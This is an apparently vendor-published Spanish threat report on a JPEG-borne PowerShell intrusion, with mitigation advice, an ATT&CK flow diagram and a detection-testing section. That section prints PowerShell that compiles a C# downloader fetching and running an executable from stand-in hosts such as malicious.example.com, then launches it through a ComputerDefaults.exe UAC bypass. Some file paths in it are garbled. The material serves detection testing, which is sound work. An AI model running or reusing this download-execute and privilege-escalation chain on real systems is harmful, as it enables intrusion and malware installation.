OPERACIÓN SILENTCANVAS : INTRUSIÓN DE POWERSHELL MULTIFASE BASADA EN JPEG

SOC Prime Team

Seguir

OPERACIÓN SILENTCANVAS : INTRUSIÓN DE POWERSHELL MULTIFASE BASADA EN JPEG

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

La Operación SilentCanvas es una intrusión sofisticada de múltiples etapas que oculta una carga útil maliciosa de PowerShell dentro de un archivo JPEG llamado sysupdate.jpeg. Esa carga útil recupera y compila un lanzador personalizado, que se construye a través de csc.exe, abusa de ComputerDefaults.exe para realizar un bypass de UAC sin archivos e instala un servicio ConnectWise ScreenConnect troyanizado llamado OneDriveServers para mantener acceso remoto persistente. El malware se comunica a través de canales cifrados dirigidos a legitserver.theworkpc.com a través de los puertos 5443 and 8041. La campaña también muestra un fuerte énfasis en la evasión de defensas, recolección de credenciales y vigilancia encubierta.

Investigación

El informe cubre tanto el análisis estático como dinámico del cargador basado en JPEG, el binario dinámica y compilado uds.exe , y los componentes modificados de ScreenConnect. Los investigadores identificaron múltiples técnicas ofensivas, incluyendo el bypass de AMSI, el abuso de binarios que viven de la tierra, el secuestro del registro, y la derivación de claves personalizadas para la comunicación cifrada. El análisis de infraestructura reveló un mapeo codificado entre legitserver.theworkpc.com y la dirección IP 45.138.16.64. La investigación también expuso un perfil detallado de las víctimas, manipulación de cuentas locales y funcionalidad vinculada al acceso oculto al escritorio.

Mitigación

Los defensores deben aplicar listas blancas estrictas para las herramientas legítimas de monitoreo y gestión remota, y restringir o monitorear de cerca la ejecución de csc.exe, cvtres.exe, y ComputerDefaults.exe. La monitorización también debe centrarse en cambios sospechosos en el registro ms-settings , comportamiento de bypass de AMSI de PowerShell, banderas de creación de procesos ocultos, y creación no autorizada de servicios que involucran el nombre OneDriveServers. Cualquier cuenta que pueda haber sido expuesta debe restablecerse, y los sistemas afectados deben aislarse rápidamente para prevenir más abusos.

Respuesta

Si se detectan indicadores relacionados, el punto final debe ponerse en cuarentena de inmediato, el uds.exe proceso malicioso y la actividad de PowerShell asociada deben terminarse, y el OneDriveServers servicio debe eliminarse del host. Los investigadores deben recopilar artefactos del registro, binarios de servicio y telemetría de red vinculada a la infraestructura de comando y control para una revisión forense más profunda. Todas las credenciales privilegiadas deben rotarse y los defensores deben monitorear patrones de movimiento lateral asociados con las técnicas documentadas en la campaña.

"graph TB %% Definiciones de clases classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodos – Acciones action_initial_access["Acción – T1566 Archivo Adjunto de Phishing: Correo electrónico entrega archivo malicioso sysupdate.jpeg disfrazado como imagen."] class action_initial_access action action_user_execution["Acción – T1204.002 Ejecución del Usuario y T1059.001 PowerShell: La víctima hace doble clic en el .jpeg que lanza PowerShell incrustado."] class action_user_execution action action_execution["Acción – T1562.001 Deshabilitar Herramientas de Seguridad (bypass de AMSI) y T1027 Ofuscación: El script de PowerShell evade la detección y oculta la lógica maliciosa."] class action_execution action action_dev_utility_abuse["Acción – T1127 Compilar Después de Entrega y T1027.004 Archivos Ofuscados/Almacenados: El script incrusta fuente de C# y compila con csc.exe para crear un lanzador personalizado."] class action_dev_utility_abuse action action_priv_esc["Acción – T1548.002 Secuestro de Flujo de Ejecución a través del protocolo ms-settings y T1218.002 Archivo HTML Compilado usando ComputerDefaults.exe para un bypass de UAC sin archivos."] class action_priv_esc action action_persistence["Acción – T1543.003 Servicio de Windows nombrado OneDriveServers y T1136.001 Cuenta Local creación de cuentas de administrador ocultas para acceso a largou2011plazo."] class action_persistence action action_tool_hijack["Acción – T1553.002 Ejecución de Proxy de Binario Firmado: Despliega binario ConnectWise ScreenConnect troyanizado abusando de componentes firmados legítimos."] class action_tool_hijack action action_credential_access["Acción – T1556.001 Enganche API de Credenciales y T1056.001 Captura de Entrada: Instala enganche de proveedor de credenciales y keylogger para recolectar credenciales de usuario."] class action_credential_access action action_collection["Acción – T1113 Captura de Pantalla, T1125 Captura de Video, T1123 Captura de Audio, T1115 Datos del Portapapeles: Recopila información visual, de audio y del portapapeles."] class action_collection action action_discovery["Acción – T1518 Descubrimiento de Software, T1010 Descubrimiento de Ventana de Aplicación, T1082 Descubrimiento de Información del Sistema: Enumera software instalado, productos antivirus, información del sistema y ventanas activas."] class action_discovery action action_c2["Acción – T1573 Canal Cifrado: Configura C2 cifrado usando claves PBKDF2/HMACu2011SHA256 y transfiere herramientas adicionales vía T1105 Transferencia de Herramientas de Ingreso."] class action_c2 action action_remote_execution["Acción – T1021 Servicios Remotos: Ejecuta comandos en la víctima a través del framework ScreenConnect."] class action_remote_execution action action_impact["Acción – T1529 Apagado/Reinicio del Sistema: Puede provocar un reinicio del sistema o un reinicio en modo seguro para interrumpir el entorno."] class action_impact action %% Nodos – Herramientas / Procesos tool_sysupdate_jpeg["Herramienta – Nombre: sysupdate.jpeg Tipo: Archivo adjunto malicioso disfrazado de imagen"] class tool_sysupdate_jpeg tool tool_powershell["Herramienta – Nombre: PowerShell Tipo: Motor de scripting usado para ejecución y ofuscación"] class tool_powershell tool tool_csc["Herramienta – Nombre: csc.exe Tipo: Compilador de C# aprovechado enu2011host"] class tool_csc tool process_computerdefaults["Proceso – Nombre: ComputerDefaults.exe Descripción: Usado como proxy para bypass de UAC sin archivos"] class process_computerdefaults process tool_screenconnect["Herramienta – Nombre: ConnectWise ScreenConnect Tipo: Software de acceso remoto hijacked with malicious payload"] class tool_screenconnect tool malware_keylogger["Malware – Nombre: Keylogger Personalizado Propósito: Capturar las pulsaciones de teclas y credenciales"] class malware_keylogger malware %% Conexiones – Flujo de Ataque action_initial_access –>|entrega| tool_sysupdate_jpeg tool_sysupdate_jpeg –>|desencadena| action_user_execution action_user_execution –>|ejecuta| tool_powershell tool_powershell –>|realiza| action_execution action_execution –>|utiliza| tool_csc tool_csc –>|crea| action_dev_utility_abuse action_dev_utility_abuse –>|produce lanzador para| action_priv_esc action_priv_esc –>|invoca| process_computerdefaults process_computerdefaults –>|habilita| action_persistence action_persistence –>|crea| action_tool_hijack action_tool_hijack –>|instala| tool_screenconnect tool_screenconnect –>|facilita| action_credential_access action_credential_access –>|instala| malware_keylogger malware_keylogger –>|habilita| action_collection action_collection –>|alimenta datos a| action_c2 action_c2 –>|apoya| action_remote_execution action_remote_execution –>|utiliza| tool_screenconnect action_remote_execution –>|conduce a| action_impact action_discovery –>|proporciona información para| action_c2 %% Estilización class tool_sysupdate_jpeg tool class tool_powershell tool class tool_csc tool class tool_screenconnect tool class process_computerdefaults process class malware_keylogger malware "

Flujo de Ataque

Narrativa y Comandos de Ataque:

Punto de apoyo inicial: El atacante obtiene una sesión de PowerShell de bajo privilegio en el punto final.
Compilación en vivo: Usando el csc.exe ya disponible, el atacante compila un descargador de C# que obtiene una carga útil de segunda etapa de un servidor C2. La compilación se lanza desde el proceso de PowerShell para satisfacer la condición de padre-hijo.
Bypass de UAC sin archivos: El atacante ejecuta el ejecutable recién construido a través de ComputerDefaults.exe, que solicita en silencio elevación sin mostrar un mensaje de UAC.
Ejecución posterior a la elevación: La carga útil elevada establece un shell reverso de vuelta al adversario.

# Paso 1 – Preparar fuente dañina de C# (en memoria)
$csSource = @"
using System;
using System.Net;
using System.Diagnostics;
public class Downloader {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string payloadUrl = "http://malicious.example.com/payload.exe";
            string tempPath = System.IO.Path.Combine($env:TEMP, "payload.exe");
            wc.DownloadFile(payloadUrl, tempPath);
            Process.Start(tempPath);
        }
    }
}
"@

$srcPath = "$env:TEMPDownloader.cs"
$exePath = "$env:TEMPDownloader.exe"
$csSource | Out-File -FilePath $srcPath -Encoding ASCII

# Paso 2 – Compilar vía csc.exe (padre = PowerShell)
& "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe" /nologo /t:exe /out:$exePath $srcPath

# Paso 3 – Activar bypass de UAC usando ComputerDefaults.exe (aún hijo de PowerShell)
$computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden

Script de Prueba de Regresión: (script autónomo de PowerShell que reproduce los pasos anteriores)

# -----------------------------------------------------------------
# Archivo: trigger_csc_uac_bypass.ps1
# Propósito: Simular la cadena de ataque csc.exe + ComputerDefaults.exe
# -----------------------------------------------------------------

# Crear fuente de C# maliciosa en el directorio TEMP
$src = @"
using System;
using System.Net;
using System.Diagnostics;
public class Payload {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string url = "http://example.com/evil.exe";
            string path = System.IO.Path.Combine($env:TEMP, "evil.exe");
            wc.DownloadFile(url, path);
            Process.Start(path);
        }
    }
}
"@

$srcPath = Join-Path $env:TEMP "Payload.cs"
$exePath = Join-Path $env:TEMP "Payload.exe"
$src | Out-File -FilePath $srcPath -Encoding ASCII

# Compilar con csc.exe (este proceso de PowerShell se convierte en el padre)
$csc = "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe"
& $csc /nologo /t:exe /out:$exePath $srcPath

# Ejecutar vía ComputerDefaults.exe para realizar un bypass de UAC silencioso
$computerDefaults = "$env:SystemRootSystem32ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden

Comandos de Limpieza:

# Eliminar artefactos generados
Remove-Item -Path "$env:TEMPPayload.cs" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPPayload.exe" -Force -ErrorAction SilentlyContinue
# Opcionalmente terminar cualquier proceso restante iniciado por la prueba
Get-Process -Name "evil" -ErrorAction SilentlyContinue | Stop-Process -Force

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis